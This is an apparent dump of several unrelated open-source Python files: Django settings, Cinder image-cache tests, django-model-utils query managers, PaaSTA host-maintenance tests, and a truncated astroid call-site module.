""allauth.socialaccount.context_processors.socialaccount"",\n \'django.core.context_processors.debug\',\n \'django.core.context_processors.i18n\',\n \'django.core.context_processors.media\',\n \'django.core.context_processors.static\',\n \'django.core.context_processors.tz\',\n \'django.contrib.messages.context_processors.messages\',\n \'django.core.context_processors.request\',\n # Your stuff: custom template context processers go here\n )\n\n # See: https://docs.djangoproject.com/en/dev/ref/settings/#template-dirs\n TEMPLATE_DIRS = (\n join(BASE_DIR, \'templates\'),\n )\n\n TEMPLATE_LOADERS = (\n \'django.template.loaders.filesystem.Loader\',\n \'django.template.loaders.app_directories.Loader\',\n )\n\n # See: http://django-crispy-forms.readthedocs.org/en/latest/install.html#template-packs\n CRISPY_TEMPLATE_PACK = \'bootstrap3\'\n ########## END TEMPLATE CONFIGURATION\n\n ########## STATIC FILE CONFIGURATION\n # See: https://docs.djangoproject.com/en/dev/ref/settings/#static-root\n STATIC_ROOT = join(os.path.dirname(BASE_DIR), \'staticfiles\')\n\n # See: https://docs.djangoproject.com/en/dev/ref/settings/#static-url\n STATIC_URL = \'/static/\'\n\n # See: https://docs.djangoproject.com/en/dev/ref/contrib/staticfiles/#std:setting-STATICFILES_DIRS\n STATICFILES_DIRS = (\n join(BASE_DIR, \'static\'),\n )\n\n # See: https://docs.djangoproject.com/en/dev/ref/contrib/staticfiles/#staticfiles-finders\n STATICFILES_FINDERS = (\n \'django.contrib.staticfiles.finders.FileSystemFinder\',\n \'django.contrib.staticfiles.finders.AppDirectoriesFinder\',\n )\n ########## END STATIC FILE CONFIGURATION\n\n ########## MEDIA CONFIGURATION\n # See: https://docs.djangoproject.com/en/dev/ref/settings/#media-root\n MEDIA_ROOT = join(BASE_DIR, \'media\')\n\n # See: https://docs.djangoproject.com/en/dev/ref/settings/#media-url\n MEDIA_URL = \'/media/\'\n ########## END MEDIA CONFIGURATION\n\n ########## URL Configuration\n ROOT_URLCONF = \'config.urls\'\n\n # See: https://docs.djangoproject.com/en/dev/ref/settings/#wsgi-application\n WSGI_APPLICATION = \'config.wsgi.application\'\n ########## End URL Configuration\n\n ########## AUTHENTICATION CONFIGURATION\n AUTHENTICATION_BACKENDS = (\n ""django.contrib.auth.backends.ModelBackend"",\n ""allauth.account.auth_backends.AuthenticationBackend"",\n )\n\n # Some really nice defaults\n ACCOUNT_AUTHENTICATION_METHOD = ""username""\n ACCOUNT_EMAIL_REQUIRED = True\n ACCOUNT_EMAIL_VERIFICATION = ""mandatory""\n ########## END AUTHENTICATION CONFIGURATION\n\n ########## Custom user app defaults\n # Select the correct user model\n AUTH_USER_MODEL = ""users.User""\n LOGIN_REDIRECT_URL = ""users:redirect""\n ########## END Custom user app defaults\n\n ########## SLUGLIFIER\n AUTOSLUG_SLUGIFY_FUNCTION = ""slugify.slugify""\n ########## END SLUGLIFIER\n\n ########## LOGGING CONFIGURATION\n # See: https://docs.djangoproject.com/en/dev/ref/settings/#logging\n # A sample logging configuration. The only tangible logging\n # performed by this configuration is to send an email to\n # the site admins on every HTTP 500 error when DEBUG=False.\n # See http://docs.djangoproject.com/en/dev/topics/logging for\n # more details on how to customize your logging configuration.\n LOGGING = {\n \'version\': 1,\n \'disable_existing_loggers\': False,\n \'filters\': {\n \'require_debug_false\': {\n \'()\': \'django.utils.log.RequireDebugFalse\'\n }\n },\n \'handlers\': {\n \'mail_admins\': {\n \'level\': \'ERROR\',\n \'filters\': [\'require_debug_false\'],\n \'class\': \'django.utils.log.AdminEmailHandler\'\n }\n },\n \'loggers\': {\n \'django.request\': {\n \'handlers\': [\'mail_admins\'],\n \'level\': \'ERROR\',\n \'propagate\': True,\n },\n }\n }\n ########## END LOGGING CONFIGURATION\n\n\n ########## Your common stuff: Below this line define 3rd party libary settings\n', '# Copyright (C) 2015 Pure Storage, Inc.\n#\n# Licensed under the Apache License, Version 2.0 (the ""License""); you may\n# not use this file except in compliance with the License. You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an ""AS IS"" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the\n# License for the specific language governing permissions and limitations\n# under the License.\n\nfrom datetime import timedelta\nimport ddt\nimport mock\n\nfrom oslo_utils import timeutils\n\nfrom cinder import context as ctxt\nfrom cinder.db.sqlalchemy import models\nfrom cinder.image import cache as image_cache\nfrom cinder import objects\nfrom cinder import test\nfrom cinder.tests.unit import fake_constants as fake\n\n\n@ddt.ddt\nclass ImageVolumeCacheTestCase(test.TestCase):\n\n def setUp(self):\n super(ImageVolumeCacheTestCase, self).setUp()\n self.mock_db = mock.Mock()\n self.mock_volume_api = mock.Mock()\n self.context = ctxt.get_admin_context()\n self.volume = models.Volume()\n vol_params = {\'id\': fake.VOLUME_ID,\n \'host\': \'foo@bar#whatever\',\n \'cluster_name\': \'cluster\',\n \'size\': 0}\n self.volume.update(vol_params)\n self.volume_ovo = objects.Volume(self.context, **vol_params)\n\n def _build_cache(self, max_gb=0, max_count=0):\n cache = image_cache.ImageVolumeCache(self.mock_db,\n self.mock_volume_api,\n max_gb,\n max_count)\n cache.notifier = self.notifier\n return cache\n\n def _build_entry(self, size=10):\n entry = {\n \'id\': 1,\n \'host\': \'test@foo#bar\',\n \'cluster_name\': \'cluster@foo#bar\',\n \'image_id\': \'PI:KEY\',\n \'image_updated_at\': timeutils.utcnow(with_timezone=True),\n \'volume_id\': \'70a599e0-31e7-49b7-b260-868f441e862b\',\n \'size\': size,\n \'last_used\': timeutils.utcnow(with_timezone=True)\n }\n return entry\n\n def test_get_by_image_volume(self):\n cache = self._build_cache()\n ret = {\'id\': 1}\n volume_id = \'70a599e0-31e7-49b7-b260-868f441e862b\'\n self.mock_db.image_volume_cache_get_by_volume_id.return_value = ret\n entry = cache.get_by_image_volume(self.context, volume_id)\n self.assertEqual(ret, entry)\n\n self.mock_db.image_volume_cache_get_by_volume_id.return_value = None\n entry = cache.get_by_image_volume(self.context, volume_id)\n self.assertIsNone(entry)\n\n def test_evict(self):\n cache = self._build_cache()\n entry = self._build_entry()\n cache.evict(self.context, entry)\n self.mock_db.image_volume_cache_delete.assert_called_once_with(\n self.context,\n entry[\'volume_id\']\n )\n\n msg = self.notifier.notifications[0]\n self.assertEqual(\'image_volume_cache.evict\', msg[\'event_type\'])\n self.assertEqual(\'INFO\', msg[\'priority\'])\n self.assertEqual(entry[\'host\'], msg[\'payload\'][\'host\'])\n self.assertEqual(entry[\'image_id\'], msg[\'payload\'][\'image_id\'])\n self.assertEqual(1, len(self.notifier.notifications))\n\n @ddt.data(True, False)\n def test_get_entry(self, clustered):\n cache = self._build_cache()\n entry = self._build_entry()\n image_meta = {\n \'is_public\': True,\n \'owner\': \'70a599e0-31e7-49b7-b260-868f441e862b\',\n \'properties\': {\n \'virtual_size\': \'1.7\'\n },\n \'updated_at\': entry[\'image_updated_at\']\n }\n (self.mock_db.\n image_volume_cache_get_and_update_last_used.return_value) = entry\n if not clustered:\n self.volume_ovo.cluster_name = None\n expect = {\'host\': self.volume.host}\n else:\n expect = {\'cluster_name\': self.volume.cluster_name}\n found_entry = cache.get_entry(self.context,\n self.volume_ovo,\n entry[\'image_id\'],\n image_meta)\n self.assertDictEqual(entry, found_entry)\n (self.mock_db.\n image_volume_cache_get_and_update_last_used.assert_called_once_with)(\n self.context,\n entry[\'image_id\'],\n **expect\n )\n\n msg = self.notifier.notifications[0]\n self.assertEqual(\'image_volume_cache.hit\', msg[\'event_type\'])\n self.assertEqual(\'INFO\', msg[\'priority\'])\n self.assertEqual(entry[\'host\'], msg[\'payload\'][\'host\'])\n self.assertEqual(entry[\'image_id\'], msg[\'payload\'][\'image_id\'])\n self.assertEqual(1, len(self.notifier.notifications))\n\n def test_get_entry_not_exists(self):\n cache = self._build_cache()\n image_meta = {\n \'is_public\': True,\n \'owner\': \'70a599e0-31e7-49b7-b260-868f441e862b\',\n \'properties\': {\n \'virtual_size\': \'1.7\'\n },\n \'updated_at\': timeutils.utcnow(with_timezone=True)\n }\n image_id = \'PI:KEY\'\n (self.mock_db.\n image_volume_cache_get_and_update_last_used.return_value) = None\n\n found_entry = cache.get_entry(self.context,\n self.volume_ovo,\n image_id,\n image_meta)\n\n self.assertIsNone(found_entry)\n\n msg = self.notifier.notifications[0]\n self.assertEqual(\'image_volume_cache.miss\', msg[\'event_type\'])\n self.assertEqual(\'INFO\', msg[\'priority\'])\n self.assertEqual(self.volume.host, msg[\'payload\'][\'host\'])\n self.assertEqual(image_id, msg[\'payload\'][\'image_id\'])\n self.assertEqual(1, len(self.notifier.notifications))\n\n @mock.patch(\'cinder.objects.Volume.get_by_id\')\n def test_get_entry_needs_update(self, mock_volume_by_id):\n cache = self._build_cache()\n entry = self._build_entry()\n image_meta = {\n \'is_public\': True,\n \'owner\': \'70a599e0-31e7-49b7-b260-868f441e862b\',\n \'properties\': {\n \'virtual_size\': \'1.7\'\n },\n \'updated_at\': entry[\'image_updated_at\'] + timedelta(hours=2)\n }\n (self.mock_db.\n image_volume_cache_get_and_update_last_used.return_value) = entry\n\n mock_volume = mock.MagicMock()\n mock_volume_by_id.return_value = mock_volume\n\n found_entry = cache.get_entry(self.context,\n self.volume_ovo,\n entry[\'image_id\'],\n image_meta)\n\n # Expect that the cache entry is not returned and the image-volume\n # for it is deleted.\n self.assertIsNone(found_entry)\n self.mock_volume_api.delete.assert_called_with(self.context,\n mock_volume)\n msg = self.notifier.notifications[0]\n self.assertEqual(\'image_volume_cache.miss\', msg[\'event_type\'])\n self.assertEqual(\'INFO\', msg[\'priority\'])\n self.assertEqual(self.volume.host, msg[\'payload\'][\'host\'])\n self.assertEqual(entry[\'image_id\'], msg[\'payload\'][\'image_id\'])\n self.assertEqual(1, len(self.notifier.notifications))\n\n def test_create_cache_entry(self):\n cache = self._build_cache()\n entry = self._build_entry()\n image_meta = {\n \'updated_at\': entry[\'image_updated_at\']\n }\n self.mock_db.image_volume_cache_create.return_value = entry\n created_entry = cache.create_cache_entry(self.context,\n self.volume_ovo,\n entry[\'image_id\'],\n image_meta)\n self.assertEqual(entry, created_entry)\n self.mock_db.image_volume_cache_create.assert_called_once_with(\n self.context,\n self.volume_ovo.host,\n self.volume_ovo.cluster_name,\n entry[\'image_id\'],\n entry[\'image_updated_at\'].replace(tzinfo=None),\n self.volume_ovo.id,\n self.volume_ovo.size\n )\n\n def test_ensure_space_unlimited(self):\n cache = self._build_cache(max_gb=0, max_count=0)\n has_space = cache.ensure_space(self.context, self.volume)\n self.assertTrue(has_space)\n\n self.volume.size = 500\n has_space = cache.ensure_space(self.context, self.volume)\n self.assertTrue(has_space)\n\n def test_ensure_space_no_entries(self):\n cache = self._build_cache(max_gb=100, max_count=10)\n self.mock_db.image_volume_cache_get_all.return_value = []\n\n self.volume_ovo.size = 5\n has_space = cache.ensure_space(self.context, self.volume_ovo)\n self.assertTrue(has_space)\n\n self.volume_ovo.size = 101\n has_space = cache.ensure_space(self.context, self.volume_ovo)\n self.assertFalse(has_space)\n\n def test_ensure_space_need_gb(self):\n cache = self._build_cache(max_gb=30, max_count=10)\n mock_delete = mock.patch.object(cache, \'_delete_image_volume\').start()\n\n entries = []\n entry1 = self._build_entry(size=12)\n entries.append(entry1)\n entry2 = self._build_entry(size=5)\n entries.append(entry2)\n entry3 = self._build_entry(size=10)\n entries.append(entry3)\n self.mock_db.image_volume_cache_get_all.return_value = entries\n\n self.volume_ovo.size = 15\n has_space = cache.ensure_space(self.context, self.volume_ovo)\n self.assertTrue(has_space)\n self.assertEqual(2, mock_delete.call_count)\n mock_delete.assert_any_call(self.context, entry2)\n mock_delete.assert_any_call(self.context, entry3)\n\n def test_ensure_space_need_count(self):\n cache = self._build_cache(max_gb=30, max_count=2)\n mock_delete = mock.patch.object(cache, \'_delete_image_volume\').start()\n\n entries = []\n entry1 = self._build_entry(size=10)\n entries.append(entry1)\n entry2 = self._build_entry(size=5)\n entries.append(entry2)\n self.mock_db.image_volume_cache_get_all.return_value = entries\n\n self.volume_ovo.size = 12\n has_space = cache.ensure_space(self.context, self.volume_ovo)\n self.assertTrue(has_space)\n self.assertEqual(1, mock_delete.call_count)\n mock_delete.assert_any_call(self.context, entry2)\n\n def test_ensure_space_need_gb_and_count(self):\n cache = self._build_cache(max_gb=30, max_count=3)\n mock_delete = mock.patch.object(cache, \'_delete_image_volume\').start()\n\n entries = []\n entry1 = self._build_entry(size=10)\n entries.append(entry1)\n entry2 = self._build_entry(size=5)\n entries.append(entry2)\n entry3 = self._build_entry(size=12)\n entries.append(entry3)\n self.mock_db.image_volume_cache_get_all.return_value = entries\n\n self.volume_ovo.size = 16\n has_space = cache.ensure_space(self.context, self.volume_ovo)\n self.assertTrue(has_space)\n self.assertEqual(2, mock_delete.call_count)\n mock_delete.assert_any_call(self.context, entry2)\n mock_delete.assert_any_call(self.context, entry3)\n\n def test_ensure_space_cant_free_enough_gb(self):\n cache = self._build_cache(max_gb=30, max_count=10)\n mock_delete = mock.patch.object(cache, \'_delete_image_volume\').start()\n\n entries = list(self._build_entry(size=25))\n self.mock_db.image_volume_cache_get_all.return_value = entries\n\n self.volume_ovo.size = 50\n has_space = cache.ensure_space(self.context, self.volume_ovo)\n self.assertFalse(has_space)\n mock_delete.assert_not_called()\n', 'from types import ClassType\nimport warnings\n\nfrom django.contrib.contenttypes.models import ContentType\nfrom django.db import models\nfrom django.db.models.fields.related import OneToOneField\nfrom django.db.models.manager import Manager\nfrom django.db.models.query import QuerySet\n\nimport django\n\nclass InheritanceQuerySet(QuerySet):\n def select_subclasses(self, *subclasses):\n if not subclasses:\n subclasses = [rel.var_name for rel in self.model._meta.get_all_related_objects()\n if isinstance(rel.field, OneToOneField)\n and issubclass(rel.field.model, self.model)]\n new_qs = self.select_related(*subclasses)\n new_qs.subclasses = subclasses\n return new_qs\n\n def _clone(self, klass=None, setup=False, **kwargs):\n for name in [\'subclasses\', \'_annotated\']:\n if hasattr(self, name):\n kwargs[name] = getattr(self, name)\n return super(InheritanceQuerySet, self)._clone(klass, setup, **kwargs)\n\n def annotate(self, *args, **kwargs):\n qset = super(InheritanceQuerySet, self).annotate(*args, **kwargs)\n qset._annotated = [a.default_alias for a in args] + kwargs.keys()\n return qset\n\n def get_subclass(self, obj):\n """"""\n FIX see https://bitbucket.PI:KEY\n and https://bitbucket.org/carljm/django-model-utils/issue/15/mti-problem-with-select_subclasses\n """"""\n def get_attribute(obj, s):\n try:\n return getattr(obj,s, False)\n except obj.__class__.DoesNotExist:\n return False\n \n if django.VERSION[0:2] < (1, 5):\n sub_obj = [getattr(obj, s) for s in self.subclasses if getattr(obj, s)] or [obj]\n else:\n sub_obj = [getattr(obj, s) for s in self.subclasses if get_attribute(obj, s)] or [obj]\n return sub_obj[0]\n\n def iterator(self):\n iter = super(InheritanceQuerySet, self).iterator()\n if getattr(self, \'subclasses\', False):\n for obj in iter:\n sub_obj = self.get_subclass(obj)\n if getattr(self, \'_annotated\', False):\n for k in self._annotated:\n setattr(sub_obj, k, getattr(obj, k))\n\n yield sub_obj\n else:\n for obj in iter:\n yield obj\n\n\nclass InheritanceManager(models.Manager):\n use_for_related_fields = True\n\n def get_query_set(self):\n return InheritanceQuerySet(self.model)\n\n def select_subclasses(self, *subclasses):\n return self.get_query_set().select_subclasses(*subclasses)\n\n def get_subclass(self, *args, **kwargs):\n return self.get_query_set().select_subclasses().get(*args, **kwargs)\n\n\nclass InheritanceCastMixin(object):\n def cast(self):\n results = tuple(self.values_list(\'pk\', \'real_type\'))\n type_to_pks = {}\n for pk, real_type_id in results:\n type_to_pks.setdefault(real_type_id, []).append(pk)\n content_types = ContentType.objects.in_bulk(type_to_pks.keys())\n pk_to_child = {}\n for real_type_id, pks in type_to_pks.iteritems():\n content_type = content_types[real_type_id]\n child_type = content_type.model_class()\n children = child_type._default_manager.in_bulk(pks)\n for pk, child in children.iteritems():\n pk_to_child[pk] = child\n children = []\n # sort children into same order as parents where returned\n for pk, real_type_id in results:\n children.append(pk_to_child[pk])\n return children\n\n\nclass QueryManager(models.Manager):\n def __init__(self, *args, **kwargs):\n if args:\n self._q = args[0]\n else:\n self._q = models.Q(**kwargs)\n super(QueryManager, self).__init__()\n\n def order_by(self, *args):\n self._order_by = args\n return self\n\n def get_query_set(self):\n qs = super(QueryManager, self).get_query_set().filter(self._q)\n if hasattr(self, \'_order_by\'):\n return qs.order_by(*self._order_by)\n return qs\n\n\nclass PassThroughManager(models.Manager):\n """"""\n Inherit from this Manager to enable you to call any methods from your\n custom QuerySet class from your manager. Simply define your QuerySet\n class, and return an instance of it from your manager\'s `get_query_set`\n method.\n\n Alternately, if you don\'t need any extra methods on your manager that\n aren\'t on your QuerySet, then just pass your QuerySet class to the\n ``for_queryset_class`` class method.\n\n class PostQuerySet(QuerySet):\n def enabled(self):\n return self.filter(disabled=False)\n\n class Post(models.Model):\n objects = PassThroughManager.for_queryset_class(PostQuerySet)()\n\n """"""\n # pickling causes recursion errors\n _deny_methods = [\'__getstate__\', \'__setstate__\', \'_db\']\n\n def __init__(self, queryset_cls=None):\n self._queryset_cls = queryset_cls\n super(PassThroughManager, self).__init__()\n\n def __getattr__(self, name):\n if name in self._deny_methods:\n raise AttributeError(name)\n return getattr(self.get_query_set(), name)\n\n def get_query_set(self):\n if self._queryset_cls is not None:\n kargs = {\'model\': self.model}\n if hasattr(self, \'_db\'):\n kargs[\'using\'] = self._db\n return self._queryset_cls(**kargs)\n return super(PassThroughManager, self).get_query_set()\n\n @classmethod\n def for_queryset_class(cls, queryset_cls):\n class _PassThroughManager(cls):\n def __init__(self):\n return super(_PassThroughManager, self).__init__()\n\n def get_query_set(self):\n kwargs = {}\n if hasattr(self, ""_db""):\n kwargs[""using""] = self._db\n return queryset_cls(self.model, **kwargs)\n\n return _PassThroughManager\n\n\ndef manager_from(*mixins, **kwds):\n """"""\n Returns a Manager instance with extra methods, also available and\n chainable on generated querysets.\n\n (By George Sakkis, originally posted at\n http://djangosnippets.org/snippets/2117/)\n\n :param mixins: Each ``mixin`` can be either a class or a function. The\n generated manager and associated queryset subclasses extend the mixin\n classes and include the mixin functions (as methods).\n\n :keyword queryset_cls: The base queryset class to extend from\n (``django.db.models.query.QuerySet`` by default).\n\n :keyword manager_cls: The base manager class to extend from\n (``django.db.models.manager.Manager`` by default).\n\n """"""\n warnings.warn(\n ""manager_from is pending deprecation; use PassThroughManager instead."",\n PendingDeprecationWarning,\n stacklevel=2)\n # collect separately the mixin classes and methods\n bases = [kwds.get(\'queryset_cls\', QuerySet)]\n methods = {}\n for mixin in mixins:\n if isinstance(mixin, (ClassType, type)):\n bases.append(mixin)\n else:\n try: methods[mixin.__name__] = mixin\n except AttributeError:\n raise TypeError(\'Mixin must be class or function, not %s\' %\n mixin.__class__)\n # create the QuerySet subclass\n id = hash(mixins + tuple(kwds.iteritems()))\n new_queryset_cls = type(\'Queryset_%d\' % id, tuple(bases), methods)\n # create the Manager subclass\n bases[0] = manager_cls = kwds.get(\'manager_cls\', Manager)\n new_manager_cls = type(\'Manager_%d\' % id, tuple(bases), methods)\n # and finally override new manager\'s get_query_set\n super_get_query_set = manager_cls.get_query_set\n def get_query_set(self):\n # first honor the super manager\'s get_query_set\n qs = super_get_query_set(self)\n # and then try to bless the returned queryset by reassigning it to the\n # newly created Queryset class, though this may not be feasible\n if not issubclass(new_queryset_cls, qs.__class__):\n raise TypeError(\'QuerySet subclass conflict: cannot determine a \'\n \'unique class for queryset instance\')\n qs.__class__ = new_queryset_cls\n return qs\n new_manager_cls.get_query_set = get_query_set\n return new_manager_cls()\n', '# Copyright 2015-2016 Yelp Inc.\n#\n# Licensed under the Apache License, Version 2.0 (the ""License"");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an ""AS IS"" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\nimport mock\n\nfrom paasta_tools import paasta_maintenance\n\n\n@mock.patch(""paasta_tools.mesos_maintenance.is_host_drained"", autospec=True)\n@mock.patch(\n ""paasta_tools.mesos_maintenance.get_hosts_past_maintenance_start"", autospec=True\n)\ndef test_is_safe_to_kill(mock_get_hosts_past_maintenance_start, mock_is_host_drained):\n mock_is_host_drained.return_value = False\n mock_get_hosts_past_maintenance_start.return_value = []\n assert not paasta_maintenance.is_safe_to_kill(""blah"")\n\n mock_is_host_drained.return_value = False\n mock_get_hosts_past_maintenance_start.return_value = [""blah""]\n assert paasta_maintenance.is_safe_to_kill(""blah"")\n\n mock_is_host_drained.return_value = True\n mock_get_hosts_past_maintenance_start.return_value = [""blah""]\n assert paasta_maintenance.is_safe_to_kill(""blah"")\n\n mock_is_host_drained.return_value = True\n mock_get_hosts_past_maintenance_start.return_value = []\n assert paasta_maintenance.is_safe_to_kill(""blah"")\n\n\n@mock.patch(""paasta_tools.paasta_maintenance.is_hostname_local"", autospec=True)\ndef test_is_safe_to_drain_rejects_non_localhosts(mock_is_hostname_local,):\n mock_is_hostname_local.return_value = False\n assert paasta_maintenance.is_safe_to_drain(""non-localhost"") is False\n\n\n@mock.patch(""paasta_tools.paasta_maintenance.getfqdn"", autospec=True)\n@mock.patch(""paasta_tools.paasta_maintenance.gethostname"", autospec=True)\ndef test_is_hostname_local_works(mock_gethostname, mock_getfqdn):\n mock_gethostname.return_value = ""foo""\n mock_getfqdn.return_value = ""foo.bar""\n assert paasta_maintenance.is_hostname_local(""localhost"") is True\n assert paasta_maintenance.is_hostname_local(""foo"") is True\n assert paasta_maintenance.is_hostname_local(""foo.bar"") is True\n assert paasta_maintenance.is_hostname_local(""something_different"") is False\n\n\n@mock.patch(\n ""paasta_tools.paasta_maintenance.utils.load_system_paasta_config"", autospec=True\n)\ndef test_are_local_tasks_in_danger_fails_safe_with_false(\n mock_load_system_paasta_config,\n):\n """"""If something unexpected happens that we don\'t know how to\n interpret, we make sure that we fail with ""False"" so that processes\n move on and don\'t deadlock. In general the answer to ""is it safe to drain""\n is ""yes"" if mesos can\'t be reached, etc""""""\n mock_load_system_paasta_config.side_effect = Exception\n assert paasta_maintenance.are_local_tasks_in_danger() is False\n\n\n@mock.patch(\n ""paasta_tools.paasta_maintenance.utils.load_system_paasta_config"", autospec=True\n)\n@mock.patch(\n ""paasta_tools.paasta_maintenance.marathon_services_running_here"", autospec=True\n)\ndef test_are_local_tasks_in_danger_is_false_with_nothing_running(\n mock_marathon_services_running_here, mock_load_system_paasta_config\n):\n mock_marathon_services_running_here.return_value = []\n assert paasta_maintenance.are_local_tasks_in_danger() is False\n\n\n@mock.patch(\n ""paasta_tools.paasta_maintenance.utils.load_system_paasta_config"", autospec=True\n)\n@mock.patch(\n ""paasta_tools.paasta_maintenance.marathon_services_running_here"", autospec=True\n)\n@mock.patch(""paasta_tools.paasta_maintenance.get_backends"", autospec=True)\n@mock.patch(""paasta_tools.paasta_maintenance.is_healthy_in_haproxy"", autospec=True)\ndef test_are_local_tasks_in_danger_is_false_with_an_unhealthy_service(\n mock_is_healthy_in_haproxy,\n mock_get_backends,\n mock_marathon_services_running_here,\n mock_load_system_paasta_config,\n):\n mock_is_healthy_in_haproxy.return_value = False\n mock_marathon_services_running_here.return_value = [(""service"", ""instance"", 42)]\n assert paasta_maintenance.are_local_tasks_in_danger() is False\n mock_is_healthy_in_haproxy.assert_called_once_with(42, mock.ANY)\n\n\n@mock.patch(\n ""paasta_tools.paasta_maintenance.utils.load_system_paasta_config"", autospec=True\n)\n@mock.patch(\n ""paasta_tools.paasta_maintenance.marathon_services_running_here"", autospec=True\n)\n@mock.patch(""paasta_tools.paasta_maintenance.get_backends"", autospec=True)\n@mock.patch(""paasta_tools.paasta_maintenance.is_healthy_in_haproxy"", autospec=True)\n@mock.patch(""paasta_tools.paasta_maintenance.synapse_replication_is_low"", autospec=True)\ndef test_are_local_tasks_in_danger_is_true_with_an_healthy_service_in_danger(\n mock_synapse_replication_is_low,\n mock_is_healthy_in_haproxy,\n mock_get_backends,\n mock_marathon_services_running_here,\n mock_load_system_paasta_config,\n):\n mock_is_healthy_in_haproxy.return_value = True\n mock_synapse_replication_is_low.return_value = True\n mock_marathon_services_running_here.return_value = [(""service"", ""instance"", 42)]\n assert paasta_maintenance.are_local_tasks_in_danger() is True\n mock_is_healthy_in_haproxy.assert_called_once_with(42, mock.ANY)\n assert mock_synapse_replication_is_low.call_count == 1\n\n\n@mock.patch(\n ""paasta_tools.paasta_maintenance.load_marathon_service_config"", autospec=True\n)\n@mock.patch(\n ""paasta_tools.paasta_maintenance.load_smartstack_info_for_service"", autospec=True\n)\n@mock.patch(\n ""paasta_tools.paasta_maintenance.get_expected_instance_count_for_namespace"",\n autospec=True,\n)\n@mock.patch(\n ""paasta_tools.paasta_maintenance.get_replication_for_services"", autospec=True\n)\ndef test_synapse_replication_is_low_understands_underreplicated_services(\n mock_get_replication_for_services,\n mock_get_expected_instance_count_for_namespace,\n mock_load_smartstack_info_for_service,\n mock_load_marathon_service_config,\n):\n mock_load_marathon_service_config.return_value.get_registrations.return_value = (\n ""service.main""\n )\n mock_get_expected_instance_count_for_namespace.return_value = 3\n mock_load_smartstack_info_for_service.return_value = {\n ""local_region"": {""service.main"": ""up""}\n }\n mock_get_replication_for_services.return_value = {""service.main"": 1}\n local_backends = [""foo""]\n system_paasta_config = mock.MagicMock()\n assert (\n paasta_maintenance.synapse_replication_is_low(\n service=""service"",\n instance=""instance"",\n system_paasta_config=system_paasta_config,\n local_backends=local_backends,\n )\n is True\n )\n\n\n@mock.patch(""paasta_tools.paasta_maintenance.gethostbyname"", autospec=True)\ndef test_is_healthy_in_harproxy_healthy_path(mock_gethostbyname,):\n mock_gethostbyname.return_value = ""127.0.0.1""\n local_port = 42\n backends = [\n {""status"": ""UP"", ""pxname"": ""service.main"", ""svname"": ""127.0.0.1:42_hostname""}\n ]\n assert (\n paasta_maintenance.is_healthy_in_haproxy(\n local_port=local_port, backends=backends\n )\n is True\n )\n\n\n@mock.patch(""paasta_tools.paasta_maintenance.gethostbyname"", autospec=True)\ndef test_is_healthy_in_haproxy_unhealthy_path(mock_gethostbyname,):\n mock_gethostbyname.return_value = ""127.0.0.1""\n local_port = 42\n backends = [\n {""status"": ""DOWN"", ""pxname"": ""service.main"", ""svname"": ""127.0.0.1:42_hostname""}\n ]\n assert (\n paasta_maintenance.is_healthy_in_haproxy(\n local_port=local_port, backends=backends\n )\n is False\n )\n\n\n@mock.patch(""paasta_tools.paasta_maintenance.gethostbyname"", autospec=True)\ndef test_is_healthy_in_haproxy_missing_backend_entirely(mock_gethostbyname,):\n mock_gethostbyname.return_value = ""127.0.0.1""\n local_port = 42\n backends = [\n {\n ""status"": ""DOWN"",\n ""pxname"": ""service.main"",\n ""svname"": ""127.0.0.1:666_otherhostname"",\n }\n ]\n assert (\n paasta_maintenance.is_healthy_in_haproxy(\n local_port=local_port, backends=backends\n )\n is False\n )\n', '# Copyright (c) 2015-2016, 2018-2020 Claudiu Popa dummy@email.com\n# Copyright (c) 2015-2016 Ceridwen dummy@email.com\n# Copyright (c) 2018 Bryce Guinta dummy@email.com\n# Copyright (c) 2018 Nick Drozd dummy@email.com\n# Copyright (c) 2018 Anthony Sottile dummy@email.com\n# Copyright (c) 2020 hippo91 dummy@email.com\n# Copyright (c) 2021 Pierre Sassoulas dummy@email.com\n\n# Licensed under the LGPL: https://www.gnu.org/licenses/old-licenses/lgpl-2.1.en.html\n# For details: https://github.com/PyCQA/astroid/blob/master/LICENSE\n\n\nfrom astroid import bases\nfrom astroid import context as contextmod\nfrom astroid import exceptions, nodes, util\n\n\nclass CallSite:\n """"""Class for understanding arguments passed into a call site\n\n It needs a call context, which contains the arguments and the\n keyword arguments that were passed into a given call site.\n In order to infer what an argument represents, call :meth:`infer_argument`\n with the corresponding function node and the argument name.\n\n :param callcontext:\n An instance of :class:`astroid.context.CallContext`, that holds\n the arguments for the call site.\n :param argument_context_map:\n Additional contexts per node, passed in from :attr:`astroid.context.Context.extra_context`\n :param context:\n An instance of :class:`astroid.context.Context`.\n """"""\n\n def __init__(self, callcontext, argument_context_map=None, context=None):\n if argument_context_map is None:\n argument_context_map = {}\n self.argument_context_map = argument_context_map\n args = callcontext.args\n keywords = callcontext.keywords\n self.duplicated_keywords = set()\n self._unpacked_args = self._unpack_args(args, context=context)\n self._unpacked_kwargs = self._unpack_keywords(keywords, context=context)\n\n self.positional_arguments = [\n arg for arg in self._unpacked_args if arg is not util.Uninferable\n ]\n self.keyword_arguments = {\n key: value\n for key, value in self._unpacked_kwargs.items()\n if value is not util.Uninferable\n }\n\n @classmethod\n def from_call(cls, call_node, context=None):\n """"""Get a CallSite object from the given Call node.\n\n :param context:\n An instance of :class:`astroid.context.Context` that will be used\n to force a single inference path.\n """"""\n\n # Determine the callcontext from the given `context` object if any.\n context = context or contextmod.InferenceContext()\n callcontext = contextmod.CallContext(call_node.args, call_node.keywords)\n return cls(callcontext, context=context)\n\n def has_invalid_arguments(self):\n """"""Check if in the current CallSite were passed *invalid* arguments\n\n This can mean multiple things. For instance, if an unpacking\n of an invalid object was passed, then this method will return True.\n Other cases can be when the arguments can\'t be inferred by astroid,\n for example, by passing objects which aren\'t known statically.\n """"""\n return len(self.positional_arguments) != len(self._unpacked_args)\n\n def has_invalid_keywords(self):\n """"""Check if in the current CallSite were passed *invalid* keyword arguments\n\n For instance, unpacking a dictionary with integer keys is invalid\n (**{1:2}), because the keys must be strings, which will make this\n method to return True. Other cases where this might return True if\n objects which can\'t be inferred were passed.\n """"""\n return len(self.keyword_arguments) != 